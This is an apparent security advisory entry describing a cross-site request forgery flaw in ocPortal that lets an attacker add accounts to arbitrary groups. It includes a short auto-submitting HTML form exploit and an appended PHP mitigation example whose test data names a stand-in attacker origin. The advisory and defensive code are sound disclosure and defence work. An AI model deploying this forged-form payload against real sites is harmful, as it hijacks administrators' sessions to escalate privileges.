Cross-site request forgery (CSRF) in ocPortal

2010-05-05T00:00:00
ID HTB22369
Type htbridge
Reporter High-Tech Bridge
Modified 2010-05-05T00:00:00

Description

High-Tech Bridge SA Security Research Lab has discovered a vulnerability in ocPortal which could be exploited to perform CSRF attacks.

1) Cross-site request forgery (CSRF) in ocPortal
The vulnerability exists due to insufficient validation of the request origin in /site/index.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link, and add an arbitrary account to an arbitrary group. Successful exploitation might result in complete compromise of the application.

Exploitation example:
<form action="http://host/site/index.php?page=groups&type=add_to&id=2" method="post" >
<input type="hidden" name="username" value="hacker" >
</form>
<script>
document.forms[0].submit()
</script>
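
Mitigation sketch, added here as an example (it is not ocPortal code and not part of the original advisory): a server-side guard that validates the request origin and a per-session token before a state-changing action such as the group change above is processed. The function names, the csrf_token field, and the sample requests are assumptions made for illustration.

```php
<?php
// Added example, not ocPortal code. Names (csrf_issue_token, csrf_request_allowed,
// the csrf_token field) and the sample requests are assumptions for illustration.
function csrf_issue_token(array &$session): string
{
    // One unpredictable token per session, embedded as a hidden field in each form.
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function csrf_request_allowed(array $server, array $post, array $session, string $expectedHost): bool
{
    // State-changing actions are accepted over POST only.
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    // Request origin: use Origin, else Referer; when present it must name our host.
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? null;
    if ($source !== null) {
        $host = parse_url($source, PHP_URL_HOST);
        if (!is_string($host) || strcasecmp($host, $expectedHost) !== 0) {
            return false;
        }
    }
    // The submitted token must equal the session token (constant-time compare).
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return is_string($expected) && is_string($supplied)
        && $expected !== '' && hash_equals($expected, $supplied);
}

// Constructed sample data.
$session = [];
$token = csrf_issue_token($session);
// Shape of the advisory's auto-submitted form: cross-site POST carrying no token.
$forged = [
    'server' => ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://attacker.example'],
    'post'   => ['username' => 'hacker'],
];
$legit = [
    'server' => ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://host'],
    'post'   => ['username' => 'newmember', 'csrf_token' => $token],
];
foreach (['forged' => $forged, 'legit' => $legit] as $name => $req) {
    $ok = csrf_request_allowed($req['server'], $req['post'], $session, 'host');
    echo $name, ': ', $ok ? 'accepted' : 'rejected', PHP_EOL;
}
```

The token check is the primary control; the origin check is defence in depth, because some clients omit both the Origin and Referer headers.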